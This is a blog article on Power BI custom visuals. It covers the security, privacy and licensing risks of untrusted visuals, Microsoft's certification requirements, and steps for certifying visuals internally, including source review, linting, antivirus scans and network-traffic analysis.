In the second article of the series Governing Custom Visuals for Power BI, we will focus on the Microsoft certification process for custom visuals, and will deduce from this process the steps you would need to take in your organization to internally certify custom visuals.
But first, let’s answer some common questions:
- What are the risks of using Power BI Custom Visuals?
- Is it safe to allow report producers to use Custom Visuals from the marketplace?
- Can you trust the certified custom visuals?
(Read the first article here).
Custom Visual – The Risks
The Custom Visuals’ API framework in Power BI allows any developer to create Custom Visuals, and publish them to AppSource (aka the marketplace). The framework is built using technologies such as D3, HTML5, and CSS3, and allows the developer to create rich user experiences inside your Power BI report, and extend the current visualization and analytic capabilities of Power BI.
Before your report consumers can enjoy the awesomeness of the custom visuals, you should be aware of the security, privacy and legal risks that you may take when you publish a Power BI report that includes an untrusted custom visual. Let’s explain these risks, using a real-life yet simple example: Imagine you love 3D Pie Charts (It’s wrong! but I shouldn’t be judgmental). One day, you find an unknown company, PieBI Fake Insights LLC, who offers you the 3D Pie Chart custom visual of your dreams. You decide to use it in your mission-critical reports that are presented to your CEO on daily basis.
Custom Visuals have access to the data that they need to render, and can send this data to external services. While there are many cases in which it makes sense to send the data away to an external web service to enrich the user experience and provide added-value insights, can you trust the custom visual’s provider and ensure that the data is handled with care, and will not be exploited?
Imagine the 3D Pie Chart, sending out your company’s most protected financial results to PieBI Fake Insights LLC? Can you trust this provider? And even if you do, can you trust the provider’s ability to deliver the best security controls to protect your data on its servers?
Four letters – GDPR – can say it all. Imagine, your 3D Pie Chart shows personal information, including names of top clients, and perhaps even their email addresses in the tooltip of the Pie Chart. To adhere to GDPR regulations, are you sure you can to send this information to PieBI Fake Insights? What happens when one of your clients asks you in the future to remove his personal data? Can you ensure that his email address will also be removed from the databases of PieBI, or did they already sell this data to 3rd parties?
Does your company follows other regulations like PCI, HIPAA or SOX? What happens if consumers or patients data is sent away via the Pie Chart visual? Does the visual pass this information in a secure way? Do the people in PieBI protect their data and are compliant with the same regulations that your company follows?
Open source is great. The 3D Pie Chart visual uses the best open source technology to render your data, but are you sure that the developers in PieBI Fake Insights LLC ensured that they have the legal rights to use the relevant open source libraries? Are you sure you are not required to provide credit to the original open source developers in your own reports?
Given the security, privacy and legal risks, you can now understand why it is important to apply some measures before custom visuals will reach mass adoption in your organization.
By default, if you use Power BI service, and your administrators are not familiar with this topic, there are no controls that restrict you from using custom visuals. When you add a custom visual through the Import from file option, you will get the following warning:
So, it is up to you to decide if the custom visual is safe, and can be trusted.
To make the decision easier for you, or for your IT, Microsoft certified 50% of the custom visuals in the marketplace, and offers a certification program for developers. Having certified visuals allows you to handpick the ones you need, and ignore the untrusted ones. As a report author, you can identify a certified visual by following one of these methods:
- Check if the custom visual is enlisted here.
- When you import a custom visual from the marketplace, ensure that it has the blue checkmark (as highlighted in the screenshot below).
- In the marketplace dialog box, you can filter the visuals by Power BI Certified, as shown in the screenshot below:
- In DataChant Power BI Custom Visuals report, select the no-entry sign in the Certified Visuals slicer to find the certified visuals, and download them using the link icon in the main table:
Let’s learn more about Microsoft’s certification process.
Microsoft Certification Process
According to Microsoft, a “certified custom visual is one that has met a set of code requirements and has passed strict security tests.” In addition to the security, privacy and legal requirements, Microsoft also wants to ensure that certified visuals work well on the Power BI service, desktop, mobile and embedded versions of Power BI, and are also successfully exported to PowerPoint and displayed in emails for subscribed users.
To certify a custom visual, the developer will need to:
- Have the visual approved for publishing in the marketplace (AppSource)
- Implement the visual using API version 1.2 or higher
- Share the source code with Microsoft
- Use only public reviewable OSS (open source software) components
- Avoid accessing external services or resources by the visual (Once this requirement is confirmed by Microsoft, the security and privacy concerns are addressed)
As part of the certification process, Microsoft recommends for the developers to use EsLint with default security ruleset, to pre-validate the code before submission. EsLint enables you to scan the Custom Visual code for errors and security violations without running the visual in Power BI. Learn more here.
To learn more about the certification process go here.
Internal Certification of Custom Visuals
So, now when you can trust certified visuals, the remaining question is this: How can you convince your organization to deploy an uncertified custom visual, and build the necessary trust that is required by your organization’s policies?
Follow Microsoft Certification Process
Ensure that the custom visual you plan to certify meet Microsoft’s requirements above: Check out the source code; Read user agreements and licenses; Ensure that there are no external network requests made by the visual; And finally scan the visuals for security violations.
Check out the Source Code
To find out if the custom visual has source code on GitHub, check out the developer’s website, or apply the following steps:
- Download the .pbiviz file from AppSource, or from DataChant Power BI Custom Visuals report above.
- Save the .pbiviz file to your local folder, and rename its extension to .zip
- Extract the zip file
- Open the package.json file (Step 1 in the next screenshot)
- Locate the visual nested object (Step 2 in the screenshot), and scroll right till you find the record field gitHubUrl (Step 3 in screenshot)
- In gitHubUrl, you will find the hyperlink to the GitHub project with the relevant source code. If there is such a project.
You should note that some developers don’t include the hyperlink to the GitHub repository. You can still inspect the custom visual’s code by reviewing the content in the unzipped folder of the .pbiviz file under the resources folder.
Scan the Custom Visual
Follow Microsoft’s recommendation and run EsLint on the code. Following the previous section, you now know how to obtain the source code, so this step should be straight forward.
I also recommend scanning the .pbiviz file using your organization’s Anti-Virus software. In the past, some custom visuals were falsely detected as malware by certain Anti-Virus products (including Microsoft’s own Windows Defender – See example here). While these virus detections are usually false, you don’t want your IT to feel reluctant to deploy your favorite custom visual, because the file is detected as a malware.
You can also use the free VirusTotal service here and upload the relevant .pbiviz file, and scan it by dozens of known anti-virus engines. For example, on September 2nd when I ran one of the custom visuals to prepare this article, VirusTotal reported it as a safe file by 57 AV engines, but detected it as virus by one engine (This alert is no longer reported, so it is most likely a false alarm).
Analyze Network Traffic
You can run the custom visual in Power BI Desktop and use network capturing tools such as Fiddler to identify network traffic between the custom visual and external web services. Make sure that your computer is not running any other products that access the Internet, and if you identify suspicious network traffic, check out the server names. Are they legit? This is a good time to contact the developer and understand the rationale behind the communication to the external service, whether it can be turned off, and which security and privacy measures are taken by the developer.
In the next article in this series, we will focus on the organizational visuals, and share their current limitations and how you can deploy them. Hope you find this article useful. Share with our IT to help them certified your uncertified custom visuals.